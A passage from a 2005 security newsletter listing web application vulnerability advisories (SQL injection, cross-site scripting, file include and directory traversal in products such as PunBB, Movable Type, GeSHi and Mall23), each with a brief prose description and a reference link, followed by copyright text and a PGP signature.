vulnerable to an information disclosure issue which could be exploited
by a remote attacker to extract username information from the
application error messages and could aid further brute force attacks.
Movable Type versions earlier than 3.2 are vulnerable.
Ref: http://www.sixapart.com/movabletype/docs/3.2/h_changelog/#entry-5869
______________________________________________________________________

05.39.44 CVE: CAN-2005-3043
Platform: Web Application
Title: Mall23 AddItem.ASP SQL Injection
Description: Mall23 is an ecommerce application written in ASP. Mall23
is prone to an SQL injection vulnerability. Successful exploitation
could result in a compromise of the application, disclosure or
modification of data, or may permit an attacker to exploit
vulnerabilities in the underlying database implementation.
Ref: http://systemsecure.org/ssforum/viewtopic.php?t=277
______________________________________________________________________

05.39.45 CVE: Not Available
Platform: Web Application
Title: Lotus Domino Unspecified Cross-Site Scripting
Description: IBM Lotus Domino is prone to a cross-site scripting
vulnerability. This is due to insufficient input validation of data
supplied through URI parameters. The specific parameter affected was
not specified by IBM. IBM Lotus Domino version 6.5.4 is reportedly
vulnerable.
Ref: http://www-1.ibm.com/support/docview.wss?rs=0&uid=swg21201845
______________________________________________________________________

05.39.46 CVE: Not Available
Platform: Web Application
Title: PunBB Forgotten Email Cross-Site Scripting
Description: PunBB is a bulletin board application. Insufficient
sanitization of user-supplied input to the "forgotten e-mail" feature
exposes the application to a cross-site scripting issue. All current
versions are affected.
Ref: http://www.securityfocus.com/bid/14912
______________________________________________________________________

05.39.47 CVE: Not Available
Platform: Web Application
Title: PunBB Language Selection File Include
Description: PunBB is a bulletin board application. It is vulnerable
to a file include issue due to a failure in the application to
properly sanitize user-supplied input. An attacker may leverage this
issue to gain unauthorized access. PunBB versions earlier than 1.2.8
are vulnerable.
Ref: http://www.punbb.org/changelogs/1.2.7_to_1.2.8.txt
______________________________________________________________________

05.39.48 CVE: Not Available
Platform: Web Application
Title: GeSHI Example.PHP Directory Traversal
Description: GeSHI is a generic syntax highlighter application written
in PHP. It is reported to be vulnerable to a directory traversal issue
due to improper sanitization of user-supplied input to the "language"
parameter of the "contrib/example.php" script. GeSHi version 1.0.7.2
is reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/14903
______________________________________________________________________

05.39.49 CVE: Not Available
Platform: Web Application
Title: Copernicus Europa Multiple Unspecified SQL Injection
Vulnerabilities
Description: Copernicus Europa is an asset finance administration and
accounting system. It is vulnerable to multiple unspecified SQL
injection issues due to a failure in the application to properly
sanitize input before using it in an SQL query. Remote attackers could
exploit this issue to compromise the application, get hold of
sensitive data or perform other attacks.
Ref: http://www.securityfocus.com/bid/14895/info
______________________________________________________________________

05.39.50 CVE: Not Available
Platform: Web Application
Title: PerlDiver Perldiver.CGI Cross-Site Scripting
Description: PerlDiver is an application which displays Perl
installation settings. It is reported to be vulnerable to a cross-site
scripting isue due to improper sanitization of user-supplied input to
the "module" parameter of the "perldiver.cgi" script. PerlDiver
version 2.31 is reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/14894
______________________________________________________________________

05.39.51 CVE: CAN-2005-3076
Platform: Web Application
Title: Simplog Multiple SQL Injection Vulnerabilities
Description: Simplog is used for adding blogging capabilities to
existing websites. It is prone to multiple SQL injection
vulnerabilities due to insufficient sanitization of user-supplied
input. Simplog version 0.9.1 is affected by this issue.
Ref: http://secunia.com/advisories/16881/
______________________________________________________________________

05.39.52 CVE: CAN-2005-3045
Platform: Web Application
Title: My Little Forum Search.PHP SQL Injection
Description: My Little Forum is a simple web-forum implemented in PHP.
It is prone to an SQL injection vulnerability. Successful exploitation
could result in a compromise of the application, disclosure or
modification of data, or may permit an attacker to exploit
vulnerabilities in the underlying database implementation. Versions
1.3 and 1.5 are vulnerable.
Ref: http://www.securityfocus.com/bid/14908
______________________________________________________________________

05.39.53 CVE: Not Available
Platform: Web Application
Title: Movable Type Remote File Include
Description: Movable Type is a web log publishing platform and it is
prone to a remote file include vulnerability. This is due to a lack of
proper sanitization of user-supplied files. As a result, files with
arbitrary extensions can be uploaded to a directory inside the web
server path. An attacker may execute arbitrary server-side script code
with the privileges of the web server process. Movable Type version
3.17 is vulnerable.
Ref: http://www.sixapart.com/movabletype/docs/3.2/h_changelog/#entry-5869
______________________________________________________________________

05.39.54 CVE: Not Available
Platform: Web Application
Title: Movable Type Multiple Unspecified HTML Injection
Vulnerabilities
Description: Movable Type is a web log publishing platform for
businesses, organizations, developers, and web designers written in
Perl. It is prone to multiple unspecified HTML injection
vulnerabilities. All current versions are affected.
Ref: http://www.securityfocus.com/bid/14912
___________________________________________________________________

(c) 2005. All rights reserved. The information contained in this
newsletter, including any external links, is provided "AS IS," with no
express or implied warranty, for informational purposes only. In some
cases, copyright for material in this newsletter may be held by a party
other than Qualys (as indicated herein) and permission to use such
material must be requested from the copyright owner.

==end==

Subscriptions: RISK is distributed free of charge to people responsible
for managing and securing information systems and networks. You may
forward this newsletter to others with such responsibility inside or
outside your organization.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (Darwin)

iD8DBQFDPIDF+LUG5KFpTkYRAuLTAJwIE4UN9R8MuNOgSRICGL7VjkPuGgCfYP/7
8uW/dTb+obOUyOK1sYoJfhA=
=GT9O
-----END PGP SIGNATURE-----

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]